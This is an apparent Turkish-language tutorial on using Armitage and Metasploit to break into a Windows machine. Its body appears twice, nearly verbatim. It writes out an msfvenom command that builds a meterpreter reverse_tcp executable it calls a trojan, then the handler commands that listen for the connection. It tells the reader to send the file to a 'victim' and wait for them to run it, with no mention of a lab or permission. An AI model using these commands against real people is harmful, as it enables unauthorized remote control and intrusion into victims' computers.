Armitage Nedir ?
Armitage, metasploit sistemini kullanan ama tema bakımından birbirinden oldukça farklı bir sızma programıdır.
İlk olarak terminalimizi açıp root izni alalım.
Ardından sızmamız için gerekli olan trojeni oluşturmaya geçelim.
Msfvenom ile oluşturacağız trojenimizi.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=XXXX -f exe > /home/user/Desktop/deneme.exe
Komudumuz yukardaki gibi, bu komudu enterledikten sonra trojenimiz oluşucak.
LHOST’a ip adresinizi yazıcaksınız, LPORT’a açtığınız portu.
İp adresinizi öğrenmek için ;
ifconfig
Komutumuz yukarıda yazıyor, ben kırmızı ile sansürledim siz orada yazan 192.168.x.x sayısını yazacaksınız.
Şimdi açtığımız trojeni Armitage ile dinlemeye alalım.
Karşımıza bi beyaz yer geldi,
Bir yere tıklamadan Connect yazısına tıklayalım.
Karşımıza gelen yerde Yes tuşuna tıklıyalım.
Şuanda tool açılıyor, bir şeye tıklamayın ve açılmasını bekleyin.
Şimdi sızma işlemini başlatma için 2 yöntem var,
Ben 2’sinide göstereceğim, size hangisi kolay gelirse onu uygulayabilirsiniz.
1. Yöntem komutları kendimiz yazıyoruz ve başlatıyoruz.
2. Yöntem ise komutları kendisi hazırlıyor biz sadece gerekenleri yazıyoruz.
1. Yöntem ile başlıyalım.
use exploit/multi/handler
Komudumuzu yazıp enterliyelim.
set payload windows/meterpreter/reverse_tcp
2. Komudumuzu yazıp tekrardan enterliyelim.
set LHOST 192.168.x.x
LHOST’tan sonraki bölüme deminden baktığımız ip adresini yazacaksınız ve enterleyelim.set LPORT 1234
LPORT’tan sonraki yere açtığınız portu yazıcaksınız. (Yerel ağdaysa portu sallayabilirsiniz.)run
Son komudumuzuda yazdıktan sonra artık trojeni dinlemeye almış bulunmaktayız.
Artık trojeni karşıya atıp açmasını bekliyelim ve bakalım trojeni çalıştırdığında bize düşecek mi ?
Ve gördüğünüz gibi kurban bize düştü.
Burdanda anlayabilirsiniz kurbanın bize düştüğünü.
Şimdi ise 2. Yönteme geçelim bu daha kolay olucak.
Şimdiki işlemimizi sol üstteki bölümden gerçekleştireceğiz.
‘exploit’ bölümünü açalım.
Şimdi ise ‘multi’ bölümünü genişletelim.
Şimdi ise multi’nin içinde bulunan ‘handler’ çift tıklıyoruz ve karşımıza böyle bir panel geldi.
Şimdi ise burda 3 şeyi düzenleyip hemen işlemi başlatıcaz.
Ve gördüğünüz gibi bütün her şeyi kendisi ayarlayıp dinleme işlemimizi başlattı.
Armitage, metasploit sistemini kullanan ama tema bakımından birbirinden oldukça farklı bir sızma programıdır.
İlk olarak terminalimizi açıp root izni alalım.
Ardından sızmamız için gerekli olan trojeni oluşturmaya geçelim.
Msfvenom ile oluşturacağız trojenimizi.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=XXXX -f exe > /home/user/Desktop/deneme.exe
Komudumuz yukardaki gibi, bu komudu enterledikten sonra trojenimiz oluşucak.
LHOST’a ip adresinizi yazıcaksınız, LPORT’a açtığınız portu.
İp adresinizi öğrenmek için ;
ifconfig
Komutumuz yukarıda yazıyor, ben kırmızı ile sansürledim siz orada yazan 192.168.x.x sayısını yazacaksınız.
Şimdi açtığımız trojeni Armitage ile dinlemeye alalım.
Terminale direk yukarıda yazan komutu yazıp enterleyelim.armitage
Karşımıza bi beyaz yer geldi,
Bir yere tıklamadan Connect yazısına tıklayalım.
Karşımıza gelen yerde Yes tuşuna tıklıyalım.
Şuanda tool açılıyor, bir şeye tıklamayın ve açılmasını bekleyin.
Şimdi sızma işlemini başlatma için 2 yöntem var,
Ben 2’sinide göstereceğim, size hangisi kolay gelirse onu uygulayabilirsiniz.
1. Yöntem komutları kendimiz yazıyoruz ve başlatıyoruz.
2. Yöntem ise komutları kendisi hazırlıyor biz sadece gerekenleri yazıyoruz.
1. Yöntem ile başlıyalım.
use exploit/multi/handler
Komudumuzu yazıp enterliyelim.
set payload windows/meterpreter/reverse_tcp
2. Komudumuzu yazıp tekrardan enterliyelim.
set LHOST 192.168.x.x
LHOST’tan sonraki bölüme deminden baktığımız ip adresini yazacaksınız ve enterleyelim.set LPORT 1234
LPORT’tan sonraki yere açtığınız portu yazıcaksınız. (Yerel ağdaysa portu sallayabilirsiniz.)run
Son komudumuzuda yazdıktan sonra artık trojeni dinlemeye almış bulunmaktayız.
Artık trojeni karşıya atıp açmasını bekliyelim ve bakalım trojeni çalıştırdığında bize düşecek mi ?
Ve gördüğünüz gibi kurban bize düştü.
Burdanda anlayabilirsiniz kurbanın bize düştüğünü.
Şimdi ise 2. Yönteme geçelim bu daha kolay olucak.
Şimdiki işlemimizi sol üstteki bölümden gerçekleştireceğiz.
‘exploit’ bölümünü açalım.
Şimdi ise ‘multi’ bölümünü genişletelim.
Şimdi ise multi’nin içinde bulunan ‘handler’ çift tıklıyoruz ve karşımıza böyle bir panel geldi.
Şimdi ise burda 3 şeyi düzenleyip hemen işlemi başlatıcaz.
Ardından Launch‘a basalım.> LHOST= İP Adresinizi
> LPORT= Portunuzu
> PAYLOAD= windows/meterpreter/reverse_tcp
Ve gördüğünüz gibi bütün her şeyi kendisi ayarlayıp dinleme işlemimizi başlattı.